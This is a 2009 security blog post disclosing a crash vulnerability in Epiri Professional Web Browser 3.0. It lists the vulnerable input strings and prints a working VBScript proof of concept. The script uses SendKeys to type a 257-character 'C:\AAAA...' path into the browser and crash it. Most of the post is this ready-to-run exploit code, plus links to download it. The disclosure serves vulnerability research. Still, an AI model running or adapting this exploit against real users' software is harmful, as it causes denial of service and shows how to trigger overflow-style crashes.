LiquidWorm's Blog: Epiri Professional Web Browser 3.0 Remote Crash Exploit

30 July, 2009

Epiri Professional Web Browser 3.0 Remote Crash Exploit

' Title: Epiri Professional Web Browser 3.0 Remote Crash Exploit

' Vendor: Horizon
' Product Web Page: http://www.horizonum.com/
' Current Version: 3.0.0.00
' Notiz: Microsoft Silverlight
' Vulnerable Mode: Browse Internet
' Tested On Microsoft Windows XP Professional SP3 (En)

' Vulnerable strings:

' file://
' C::
' C:\AAAA...AAAA [257]
'

' Vulnerability Discovered By Gjoko 'LiquidWorm' Krstic
' liquidworm gmail com
' http://www.zeroscience.org/
' 28.07.2009

' Working PoC: http://zeroscience.org/codes/epiri_crash.vbs

Dim crash

Set crash = CreateObject("WScript.Shell")

With crash

Do Until Success = True

Success = crash.AppActivate("Epiri Professional 3.0")

Loop

'.SendKeys "file://"
'.SendKeys "C::"
.SendKeys "C:\AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"

.SendKeys "~" 'Return

End With

Wscript.Quit

http://zeroscience.org/codes/epiri_crash.txt
http://zeroscience.org/codes/epiri_crash.vbs

LiquidWorm's Blog

30 July, 2009

Epiri Professional Web Browser 3.0 Remote Crash Exploit

No comments:

About Me :)

Archive

Vulnerabilities! - Zero Science Lab

IT.com.mk - Македонски ИТ портал

Exploit-DB.com RSS Feed

Slashdot

SANS Internet Storm Center, InfoCON: green

Packet Storm Security Headlines

Cisco Security Advisory

Help Net Security - News

SecurityFocus Vulnerabilities

SecurityReason.com - RSS - SecurityAlert